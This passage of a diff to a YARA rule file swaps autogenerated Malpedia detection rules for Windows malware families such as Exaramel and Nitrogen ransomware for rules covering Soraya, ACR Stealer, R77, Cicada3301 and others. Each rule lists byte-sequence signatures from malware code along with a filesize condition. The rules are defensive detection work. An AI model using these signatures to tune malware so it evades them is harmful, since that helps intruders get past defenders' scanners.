-		$sequence_7 = { eb15 488d05172b4e00 e8???????? 488b4c2440 48ff4158 c60002 4889c3 }
-		$sequence_8 = { eb1a 440fb64c342a 4183c14d 4401ca 88543c2a 448844342a 4883c002 }
-		$sequence_9 = { e8???????? 833d????????00 750e 488b8c24e8060000 48894818 eb15 488d7818 }
+		$sequence_0 = { 80f12a 884c241e 0f280424 0f29442470 0f1044240f 0f1144247f 8dbc24a0000000 }
+		$sequence_1 = { 660f7f442440 89542450 897c2454 894c2458 8b44240c 8944245c 803e04 }
+		$sequence_2 = { 8b913b148901 33540804 89540c04 83c104 83f918 72ea 8a401c }
+		$sequence_3 = { 8d3449 8d0cb2 81c10c010000 8d14f2 8918 c7400400000000 897808 }
+		$sequence_4 = { e8???????? 83c40c 8b442418 8944246c 895c2470 8b44240c 89442474 }
+		$sequence_5 = { 8d742450 89442450 89f1 e8???????? 89d9 e8???????? 85c0 }
+		$sequence_6 = { 8d9c24b4000000 89d9 8d942498000000 57 e8???????? 83c404 89d9 }
+		$sequence_7 = { e8???????? 8b1e 8b7e04 53 ff17 83c404 837f0400 }
+		$sequence_8 = { 8d0440 8b4c2464 8b7c8104 8b448108 897c240c 31ed 85c0 }
+		$sequence_9 = { 8b54247c 8bbc2480000000 f30f7e442448 660fd6442468 8b442450 89442470 8d8c24d8000000 }
 
 	condition:
-		7 of them and filesize < 29914112
+		7 of them and filesize < 1646592
 }
-rule MALPEDIA_Win_Exaramel_Auto : FILE
+rule MALPEDIA_Win_Soraya_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9d8ef319-a5df-534f-b138-19485cbaf19b"
+		id = "a07d2ec9-21c3-51d7-8a6a-aaea120dc635"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.exaramel_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.soraya_auto.yar#L1-L232"
 		license_url = "N/A"
-		logic_hash = "0034b5ba03392faf6ba4ea9ba70e440d6025311290e39d869c6ea3fe5bf2d84b"
+		logic_hash = "67d5293b43a7462b9bb676c8134e4e8a6a8c166af85a6bac43befacfaf313c24"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -131899,32 +131772,45 @@ rule MALPEDIA_Win_Exaramel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7539 a3???????? c705????????01000000 ff15???????? 8b35???????? 68???????? }
-		$sequence_1 = { be05400080 e9???????? 8d8528f8ffff 57 50 }
-		$sequence_2 = { ff15???????? 85c0 746d 53 57 ff75fc 8b3d???????? }
-		$sequence_3 = { 8b1d???????? 660f1f440000 8b0d???????? 8d85e4fbffff 6aff 6a00 }
-		$sequence_4 = { 742b 8b01 8d55f8 52 51 8b4068 ffd0 }
-		$sequence_5 = { e8???????? c70021000000 e9???????? 894ddc c745e068a54100 e9???????? c745e064a54100 }
-		$sequence_6 = { c1f806 6bc930 8b048560dd4100 f644082801 7406 8b440818 5d }
-		$sequence_7 = { 744e 85f6 7504 33c0 eb18 56 6a00 }
-		$sequence_8 = { 57 e8???????? 8bf0 83c428 85f6 0f881c010000 }
-		$sequence_9 = { 33c0 668945e8 8b45d4 886de5 8b148560dd4100 }
+		$sequence_0 = { ff15???????? 8d48bf 80f919 77f2 }
+		$sequence_1 = { 488d4dd0 488bd0 488bd8 ff15???????? 458bc7 33d2 }
+		$sequence_2 = { 833800 7411 c1d30b 8b18 0fbdc1 8b45e4 }
+		$sequence_3 = { 2bfa 037d0c 3bc7 72cd 8b4510 33c1 }
+		$sequence_4 = { ba02c10d00 33c8 2bfa 2bca 0faff9 eb46 }
+		$sequence_5 = { ffd0 85c0 7536 8b75ec 83feff 742e }
+		$sequence_6 = { 488bce ff15???????? 488bcd ff15???????? 498bce ff15???????? }
+		$sequence_7 = { 488bcf ff15???????? 83f801 753b }
+		$sequence_8 = { 6a04 6800300000 6a0a 56 ff15???????? 8b3d???????? }
+		$sequence_9 = { 52 8d45d8 50 8b45f8 33c6 }
+		$sequence_10 = { a1???????? 69c941370000 8bfa 33d2 f7f3 33d2 }
+		$sequence_11 = { ffd7 68???????? 8d85f8fdffff 50 ffd6 e8???????? 50 }
+		$sequence_12 = { 4885c0 0f84b8000000 488364242000 4c8d442430 41b930000000 }
+		$sequence_13 = { 7511 488bc5 81e1ff0f0000 482b4630 4a010411 8b4a04 }
+		$sequence_14 = { e8???????? 68???????? ff15???????? 8b3d???????? 8bd8 68???????? 53 }
+		$sequence_15 = { 488d4550 4c8d442450 4183c9ff 33d2 33c9 }
+		$sequence_16 = { 8d41f2 66898552ffffff 83c016 66898554ffffff }
+		$sequence_17 = { 72c8 4c891d???????? 488d0d1fe0ffff ff15???????? 488bc8 e8???????? 488d0dfadfffff }
+		$sequence_18 = { 8b45fc 8b7508 33c3 2bc7 }
+		$sequence_19 = { 3bf0 72e4 eb03 8b55fc }
+		$sequence_20 = { 8b45ec 41 3bc8 72e8 8b7df4 8b45f0 }
+		$sequence_21 = { 8b4dcc 8365f400 894dfc 0fb74b06 2bc7 49 }
+		$sequence_22 = { 6a0c 58 e8???????? 59 85c0 0f849e000000 2b75fc }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Gophe_Auto : FILE
+rule MALPEDIA_Win_Acr_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2491eb29-3935-5849-a2ad-9eccac6a7b9a"
+		id = "547d8bdd-72e9-53c8-a71c-7409f9635ddc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gophe_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acr_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acr_stealer_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "5cb34ff791810c63e96dde8e723ffcb01f24b10439430c6d1044dfaa95dacbda"
+		logic_hash = "c2e01cdbfe17e3a90e2e6ed950f1a1b39c17c8ce5a68e48be7cf324c1277f6cb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131938,38 +131824,32 @@ rule MALPEDIA_Win_Gophe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 833902 0f94c0 84c0 7407 }
-		$sequence_1 = { b905000000 ff15???????? 8b05???????? 85c0 }
-		$sequence_2 = { 8d45f4 64a300000000 68e0000000 e8???????? 83c404 }
-		$sequence_3 = { 85c0 7509 b803000000 5d }
-		$sequence_4 = { c744242880000008 c744242003000000 4533c9 ba00000080 458d4103 }
-		$sequence_5 = { 85f6 7416 6830020000 6a00 }
-		$sequence_6 = { c744242010000000 4533c9 4c8b4210 8b5208 ff9088000000 }
-		$sequence_7 = { 57 68???????? c70605000000 e8???????? }
-		$sequence_8 = { 85c0 7838 488b4c2440 ff15???????? 8bf8 85c0 }
-		$sequence_9 = { 8bf0 83c404 8bd6 b9???????? }
-		$sequence_10 = { 8bf8 e8???????? 83c408 8d5001 }
-		$sequence_11 = { 837d0800 7507 b802000000 5d c3 33c0 }
-		$sequence_12 = { 90 4c8b45b8 4d8bc8 4d8b00 }
-		$sequence_13 = { b801000000 eb09 83c8ff eb04 }
-		$sequence_14 = { c744242880000000 c744242003000000 4533c9 4533c0 ba00000080 ff15???????? 488bf8 }
-		$sequence_15 = { 8b4dec 33cd e8???????? 8be5 5d c21000 c745fc02000000 }
+		$sequence_0 = { 8b7008 8bce 6a00 ff15???????? 8bcf ffd6 5f }
+		$sequence_1 = { 6a0b 68???????? eb07 6a04 68???????? 8b3f 8b07 }
+		$sequence_2 = { 72fa 53 ff30 8b45f8 ff37 8b7030 }
+		$sequence_3 = { e8???????? 8bf2 33c9 c1ee0f 33f0 33ca }
+		$sequence_4 = { 8955f4 ff7407f8 e8???????? 8bfe 8955f0 83c410 }
+		$sequence_5 = { ff7034 ff15???????? ffd6 83c410 85c0 0f8490000000 8b4ddc }
+		$sequence_6 = { 894e44 83f908 73da 8b95b4feffff 3bd7 0f821affffff 8b4dfc }
+		$sequence_7 = { 397df4 7508 3bc1 0f8411ffffff 85c9 7403 49 }
+		$sequence_8 = { 8955f4 85c0 7406 c70000000000 85db 0f8420010000 33c0 }
+		$sequence_9 = { 85db 7469 83fb03 7329 66019e12860000 0f1f440000 8bc7 }
 
 	condition:
-		7 of them and filesize < 1582080
+		7 of them and filesize < 1246208
 }
-rule MALPEDIA_Win_Rofin_Auto : FILE
+rule MALPEDIA_Win_Winsloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c9b1467e-a51a-5bb8-8a94-4fccc519267e"
+		id = "191c86a4-a63b-58ad-aa56-a92769922387"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rofin_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.winsloader_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "d75f02a0b301194d004b242ba71e57b27fdd5fa1479d807d198f353683f5f00e"
+		logic_hash = "b2fd64965251990b571c8a72ebd9a6faa4e5fa165dfd7a3b0d129cdd9946e8f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131983,32 +131863,38 @@ rule MALPEDIA_Win_Rofin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f804 753f 8b11 8a02 3c30 7507 8b5108 }
-		$sequence_1 = { 837c241801 7407 33db e9???????? 6a00 6a00 56 }
-		$sequence_2 = { 56 57 8b7c2414 33c0 33f6 85ff }
-		$sequence_3 = { e8???????? 8bf0 83c404 803e00 7453 6a0a }
-		$sequence_4 = { 8a4802 84c9 743f 8a4801 84c9 750e 8a4802 }
-		$sequence_5 = { 56 3b0d???????? 57 7358 8bc1 c1f805 8d3c85209e4200 }
-		$sequence_6 = { 45 f2ae 8b442410 f7d1 2bf9 83c00d 8bd1 }
-		$sequence_7 = { 89b42434010000 c744242800000000 ff15???????? 8d4c2418 51 56 e8???????? }
-		$sequence_8 = { 59 c3 8b8d90fcffff e9???????? 8b8d90fcffff 81c168030000 e9???????? }
-		$sequence_9 = { 8b442424 6a40 68???????? 50 e8???????? 83c41c 5f }
+		$sequence_0 = { 83c40c a4 ffd0 5b 5f }
+		$sequence_1 = { 83c434 85ff 7510 56 e8???????? 83c404 33c0 }
+		$sequence_2 = { 8d5c3304 e8???????? 8b0d???????? 8b15???????? 6689841dfcfbffff }
+		$sequence_3 = { b8???????? 83c40c 66c7843500fcfffff90b 8d4801 8d4900 }
+		$sequence_4 = { 75f9 2bc1 0fb6f8 888435fefbffff 8d4701 50 }
+		$sequence_5 = { 8d44020c 0fb6f9 66898435fefbffff 888c3500fcffff 8d4f01 51 8d943501fcffff }
+		$sequence_6 = { 50 e8???????? 68???????? 8d5c3304 }
+		$sequence_7 = { 83c40c 03f7 b8???????? 66c78435fcfbffff9001 8d4801 8a10 40 }
+		$sequence_8 = { 83c40c 6800040000 8d8dfcf7ffff 51 }
+		$sequence_9 = { 8d8dfcf7ffff e8???????? 85c0 7507 33c0 }
+		$sequence_10 = { 894df0 8b34cdb86a0110 8b4d08 6a5a 2bce 5b }
+		$sequence_11 = { 7466 40 68???????? 50 e8???????? 83c408 }
+		$sequence_12 = { 57 8db8b0c20110 57 ff15???????? ff0d???????? }
+		$sequence_13 = { 8b85f8f3ffff c68405fcfbffff0b 8b8df8f3ffff 83c101 898df8f3ffff }
+		$sequence_14 = { 0f84ee020000 66660f1f840000000000 81f900010000 0f8587000000 8bce }
+		$sequence_15 = { 1bc0 23c1 83c008 5d c3 8b04c50c480110 5d }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Nitrogen_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Keyhole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f1d15105-1f60-56bd-9f57-5d0889e5b371"
+		id = "1424dce1-e15d-5891-8b31-d03e6f9196b6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitrogen_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nitrogen_ransomware_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyhole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.keyhole_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "80271e297eab8217b53749d1fda8214698e5eac53c180b085f9fa59013bd1e3e"
+		logic_hash = "5d8e02829700ab11940f33d62fd46ba422e843d7ddb0ea7b421b42e641a7096f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132022,32 +131908,32 @@ rule MALPEDIA_Win_Nitrogen_Ransomware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f26c 4183c405 66410f6ed8 4183f569 8b8c2470030000 4183f46c 660f6eca }
-		$sequence_1 = { 83c004 31d0 66898424bc020000 0fb79424be020000 8b8424b0020000 83c005 31d0 }
-		$sequence_2 = { 66898424ae240000 0fb79424b0240000 8b8424a0240000 83c006 31d0 66898424b0240000 0fb79424b2240000 }
-		$sequence_3 = { 4189c3 8b8424a06a0000 83c01b 663305???????? 89c3 8b8424a06a0000 83c01c }
-		$sequence_4 = { 83c20d 8944247c 8b8424204f0000 83f274 89442478 8b8424204f0000 89442474 }
-		$sequence_5 = { 89442428 660fc4cf01 448b8424702a0000 66450fc4cb01 894c2424 4183c107 66410f62c9 }
-		$sequence_6 = { 83f065 668984247a400000 0fb7442420 83c00e 83f072 668984247c400000 31c0 }
-		$sequence_7 = { 440fb73d???????? 0f118c24d0650000 8d680a 0fb705???????? 418d4f0a 440fb73d???????? 8d780a }
-		$sequence_8 = { 6689bc24900a0000 0fb77c245e 6689bc24920a0000 6689b424940a0000 f30f6fac24400a0000 f30f6fa424700a0000 66899c24960a0000 }
-		$sequence_9 = { ff15???????? 8b542440 4889d9 83ca04 ff15???????? 90 4883c468 }
+		$sequence_0 = { 8d442404 0f11442404 50 0f11442418 c744240830000000 c744241090f36800 c744241c00000000 }
+		$sequence_1 = { 2bee 90 8a01 8d4901 884429ff 83ef01 75f2 }
+		$sequence_2 = { 6a00 ff15???????? 8bd8 85ff 7515 8b0d???????? 81c15d010000 }
+		$sequence_3 = { 47 83c414 83c614 3bf8 72da a1???????? 33ff }
+		$sequence_4 = { 83ec08 53 8b5c2418 8bc3 d1e8 56 8d3440 }
+		$sequence_5 = { c3 a900080000 7404 33c0 eb11 56 53 }
+		$sequence_6 = { 7507 b9f5060000 eb1a 83f920 7205 83f97e 761e }
+		$sequence_7 = { 85c0 741f 53 e8???????? 83c404 85c0 }
+		$sequence_8 = { 3bf7 725d 8b7c2420 8bc2 25ff030000 0fbf844560010000 89442410 }
+		$sequence_9 = { 8d442420 50 55 6a00 ff15???????? 8b442428 8b542420 }
 
 	condition:
-		7 of them and filesize < 2590720
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Bistromath_Auto : FILE
+rule MALPEDIA_Win_Classfon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3bccd3a0-c0bd-5aa2-bcab-9b1969a6c7fd"
+		id = "a555a1ed-ff7a-5a40-964f-e4a3266a1aa9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bistromath_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.classfon_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "6eb59622b909c4597fcaca67234110606cdc73af8fb69989e1a6ed85248b5331"
+		logic_hash = "4a5e61a984c75da7dda5bee4683bb4bb3bc0f6865b6aa2b1e5cfe06d77a7200c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132061,32 +131947,32 @@ rule MALPEDIA_Win_Bistromath_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff701c e8???????? ff75f8 ba17000000 8945e4 6aff 8bce }
-		$sequence_1 = { e8???????? 83c408 85c0 7414 8b4d08 89482c 8b4c2434 }
-		$sequence_2 = { e8???????? 8bf0 85f6 7533 8b4b04 8d4308 50 }
-		$sequence_3 = { 8bf9 8d45fc 50 8bf2 8b0f e8???????? 83c408 }
-		$sequence_4 = { e8???????? 8bf8 85ff 7416 ff75fc ff75f4 57 }
-		$sequence_5 = { 8d850cffffff 6a00 50 e8???????? 83c40c 8d85fcfeffff 50 }
-		$sequence_6 = { ffb594f4ffff 8bd3 8d8db8f8ffff e8???????? 83c404 8d85b8f8ffff 50 }
-		$sequence_7 = { ffd0 83c404 83460cff 8b06 c7461400000000 8945fc 751e }
-		$sequence_8 = { e8???????? 84c0 7504 33f6 eb1e 6a40 e8???????? }
-		$sequence_9 = { 8d8504ffffff 50 57 ffd6 8985b8feffff 8d45e0 50 }
+		$sequence_0 = { 0f855c010000 8a442424 8d7c2424 84c0 742a 8b1d???????? a1???????? }
+		$sequence_1 = { 89be04020000 8b8600020000 3bc7 740e 83f8ff }
+		$sequence_2 = { 57 b985000000 33c0 8d7c240d c644240c00 f3ab 66ab }
+		$sequence_3 = { 53 56 8b35???????? 57 8bbc24dc070000 6800010000 8b07 }
+		$sequence_4 = { 7520 8b4350 6a04 6800200000 }
+		$sequence_5 = { 6a20 68ff010f00 6a00 8bd0 }
+		$sequence_6 = { 8bf0 3bf5 0f859d010000 8d4c241c 8d542424 51 8b4c2414 }
+		$sequence_7 = { 683f000f00 6a00 51 52 ff15???????? 8bf0 85f6 }
+		$sequence_8 = { 6a01 6800000080 57 ff15???????? 8b742418 83f8ff }
+		$sequence_9 = { 8b442418 8d4c2400 c744240000000000 51 68???????? }
 
 	condition:
-		7 of them and filesize < 33816576
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Fobber_Auto : FILE
+rule MALPEDIA_Win_R77_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "910b3d1e-c7a6-55ab-b1c2-4f8035f4a57d"
+		id = "b79f20de-193b-5b74-8687-5e00cdb0b22f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fobber_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r77"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.r77_auto.yar#L1-L158"
 		license_url = "N/A"
-		logic_hash = "3cf9174005b14188a8f0ba63481f290f2ae0ab907becb2c7edb09c680f60ed5d"
+		logic_hash = "ee9f3e01cb496a017b30e9f636bd55f0ca4c077d0d62d251be75c67533f23dc5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132100,38 +131986,36 @@ rule MALPEDIA_Win_Fobber_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b750c 8b4d10 39f7 760e }
-		$sequence_1 = { 57 51 8b7d08 30c0 31c9 f7d1 }
-		$sequence_2 = { 8d0431 39f8 7607 49 01cf }
-		$sequence_3 = { 57 e8???????? 85c0 740f 89c1 }
-		$sequence_4 = { 8d4d08 51 ff31 ffd0 }
-		$sequence_5 = { 55 89e5 ff750c 6800300000 }
-		$sequence_6 = { 0453 42 e2f6 59 }
-		$sequence_7 = { f2ae 31c0 e303 4f }
-		$sequence_8 = { 8981efc00700 0081efe82300 0081c7371300 0081c7546900 0081c7397d00 00e9 }
-		$sequence_9 = { 0f85196e0100 807dfc00 7407 8b4df8 836170fd 5e }
-		$sequence_10 = { 4d fc 02e9 5a a2???????? 92 b4ff }
-		$sequence_11 = { 0f8423050000 ff7508 e8???????? 59 59 8b4508 }
-		$sequence_12 = { 43 7706 6205???????? 294a75 f2149c }
-		$sequence_13 = { 6a52 686bb7ade9 e8???????? 83c408 }
-		$sequence_14 = { 3bc3 7524 8b451c 3bc3 }
-		$sequence_15 = { 33db 57 3bcb 0f8499840100 3bf3 0f84a2840100 }
+		$sequence_0 = { 740c 8b4f0c e8???????? 85c0 }
+		$sequence_1 = { 740b 8b0f e8???????? 85c0 }
+		$sequence_2 = { bafeff0000 6623c2 6683f806 721a 41b803000000 }
+		$sequence_3 = { c1e202 8b4508 0fb60c10 83f91f 757d }
+		$sequence_4 = { 0f8595010000 c745e4f8630110 e9???????? 894de0 c745e4f8630110 e9???????? }
+		$sequence_5 = { ba01000000 c1e200 8b4508 0fb60c10 81f990000000 750a }
+		$sequence_6 = { c745fc???????? eb07 c745fc???????? 8b4dfc 894df8 8b5510 }
+		$sequence_7 = { 83e03f c1eb06 6bf838 8b049df8a00110 f644072801 7444 837c0718ff }
+		$sequence_8 = { b801000000 d1e0 8b4d08 0fb61401 85d2 750a }
+		$sequence_9 = { 488d157ad40000 e8???????? 8bcb 4885c0 740c 4883c420 }
+		$sequence_10 = { ff15???????? 4889442450 488bd8 48897c2458 8d7d01 4885f6 }
+		$sequence_11 = { c3 4883ec38 488d05f5d50100 4889442428 488b05???????? 4889442420 48837c242000 }
+		$sequence_12 = { 488b4c2440 e8???????? eb55 4c8b4c2458 4c8b442450 488d15f3010200 488b4c2440 }
+		$sequence_13 = { 4885db 7436 488b0d???????? 4885c9 7410 488b4910 488bd3 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 350208
 }
-rule MALPEDIA_Win_Brambul_Auto : FILE
+rule MALPEDIA_Win_Jolob_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4ed55462-e49e-50fe-a0d1-6f0e1f85cf77"
+		id = "e26fb753-78dd-5e02-86f5-44abfa0b6e1a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.brambul_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jolob_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "938c39a82f375c34fe26abb1fc00229e1aa1c5407e38b617fd73b29996474592"
+		logic_hash = "95fc52fc444139dde815965f9b3fdbca25ad1f5fb52fadd80f33a59c158da935"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132145,38 +132029,32 @@ rule MALPEDIA_Win_Brambul_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4e03 2bee 8a01 8ad8 80e30f c0e804 }
-		$sequence_1 = { a3???????? 68???????? 68???????? e8???????? 83c408 50 }
-		$sequence_2 = { 8d8c2438020000 51 ff15???????? 8bac2428090000 83c9ff 8bfd }
-		$sequence_3 = { 33c0 8d94240c010000 f2ae f7d1 2bf9 6a00 8bc1 }
-		$sequence_4 = { 8b4c241c 40 3bc1 89442418 0f8cfefeffff 8b442414 }
-		$sequence_5 = { 83c40c 8b5514 833a00 0f84db000000 837decfe 0f8ed1000000 c745e401000000 }
-		$sequence_6 = { 8985a849ffff 8985c05dffff 8985c45dffff 8945f8 895df0 }
-		$sequence_7 = { 8b4002 8985b049ffff c785ac49ffff02000000 e9???????? f6c140 0f8428010000 f6c120 }
-		$sequence_8 = { 42 bf08000000 89542410 c6041600 85ed }
-		$sequence_9 = { 48 234508 8d0440 8d0441 0fb64801 }
-		$sequence_10 = { 8913 5f d3e7 3bc8 7316 }
-		$sequence_11 = { 46 6a00 8d849db84dffff 56 }
-		$sequence_12 = { 0f8e5b020000 68???????? 68???????? 8d54242c 68???????? 52 }
-		$sequence_13 = { 03f3 8bd9 8dbc379979825a 8bf7 }
-		$sequence_14 = { 81c404010000 c3 56 8d542414 68???????? }
-		$sequence_15 = { c1ee17 c1e709 0bf7 33ce 8bf9 33fa }
+		$sequence_0 = { 6a64 ff15???????? e9???????? 8b431c e8???????? ff7318 e8???????? }
+		$sequence_1 = { ff15???????? 50 ff15???????? 8d85ecfeffff 50 ff15???????? 85c0 }
+		$sequence_2 = { 3bc2 75ec 834710f8 8d75dc e8???????? ff75f4 ff15???????? }
+		$sequence_3 = { 832600 59 8bb720080000 8b2d???????? 85f6 7415 }
+		$sequence_4 = { 8945e4 e8???????? 8b5de4 8b4f0c 53 }
+		$sequence_5 = { 8a45ff 88043e 46 83fe04 7c1f 807c3efc0d 7518 }
+		$sequence_6 = { 8bc6 5e c20400 832700 85f6 7410 8b4618 }
+		$sequence_7 = { 8d7df4 e8???????? 8b45f4 8906 5f c9 c3 }
+		$sequence_8 = { 3b4e30 72e9 8918 8b463c }
+		$sequence_9 = { 3bc3 7407 50 e8???????? 59 895e14 895e10 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Icondown_Auto : FILE
+rule MALPEDIA_Win_Cicada3301_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "52465a95-defc-5467-a071-e9d8d0b66fd6"
+		id = "7338c12c-73b8-5d10-8e46-a50135055df6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icondown_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cicada3301"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cicada3301_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ff2f5c555fcd472199db73f9b56f95ccfa2dde0f7fa2e7a52a938cbd42967fd9"
+		logic_hash = "71afdc3382366bc56a3a7b41e98090049ed0f50bc476acc71b1f38d7b1e1424b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132190,32 +132068,32 @@ rule MALPEDIA_Win_Icondown_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8b4608 8d542414 52 }
-		$sequence_1 = { 8bcf e8???????? 85c0 7415 8b4c2418 8b10 }
-		$sequence_2 = { c7466c01000000 8b4b1c 51 ff15???????? 5f 5e 5d }
-		$sequence_3 = { e8???????? 8d966c020000 52 68e9030000 57 e8???????? 8d8670020000 }
-		$sequence_4 = { 8b8690000000 8b48f8 85c9 740d 8b4e64 50 51 }
-		$sequence_5 = { 894e54 8b15???????? 895658 a1???????? 89465c 8b0d???????? }
-		$sequence_6 = { 46 f680c11c450004 741c 837d1000 }
-		$sequence_7 = { 895658 a1???????? 89465c 8b0d???????? 894e60 8b15???????? 895664 }
-		$sequence_8 = { 52 8b481c 51 ff15???????? 8b442404 6a01 }
-		$sequence_9 = { 740d 8b01 6a01 ff10 8b4e10 }
+		$sequence_0 = { e8???????? 4c8d057fb12e00 4c89d9 4c89d2 e8???????? 4c8d059db12e00 4c89d9 }
+		$sequence_1 = { e8???????? 4531ff 4c89f9 4889f2 e8???????? 31db 4889d9 }
+		$sequence_2 = { f30f6f00 0f104810 0f105020 660f7f842420010000 0f298c2430010000 0f29942440010000 488b542470 }
+		$sequence_3 = { e9???????? 4885c0 0f8499070000 84db 0f85c9020000 488b9c24b0010000 4839cf }
+		$sequence_4 = { e8???????? 49ffcf 4d897e48 4d85ed 0f84e2010000 4c896c2428 0f28442460 }
